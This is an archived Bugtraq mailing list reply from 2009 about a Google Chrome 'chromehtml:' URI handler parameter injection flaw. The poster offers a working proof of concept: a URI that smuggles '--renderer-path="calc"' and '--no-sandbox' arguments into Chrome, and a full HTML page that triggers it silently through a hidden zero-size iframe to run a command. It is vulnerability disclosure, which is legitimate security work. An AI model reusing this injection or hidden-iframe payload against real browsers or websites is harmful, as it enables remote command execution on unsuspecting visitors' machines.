lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-Id: <200901301758.n0UHws7k031740@www5.securityfocus.com> Date: Fri, 30 Jan 2009 10:58:54 -0700 From: come2waraxe@...oo.com To: bugtraq@...urityfocus.com Subject: Re: Re: Google Chrome Browser (ChromeHTML://) remote parameter injection POC Try this: chromehtml:"%20--renderer-path="calc"%20--no-sandbox Disabling sandbox does matter :) Tested with Google Chrome Chrome 1.0.154.46 on Win XP/Vista and IE6/IE7 and it works ... Full PoC: <html><head><title>Chrome URI Handler Remote Command Execution PoC</title></head> <body> <h3>This is a test</h3> <iframe src='chromehtml:"%20--renderer-path="calc"%20--no-sandbox' width=0 height=0></iframe> </body></html>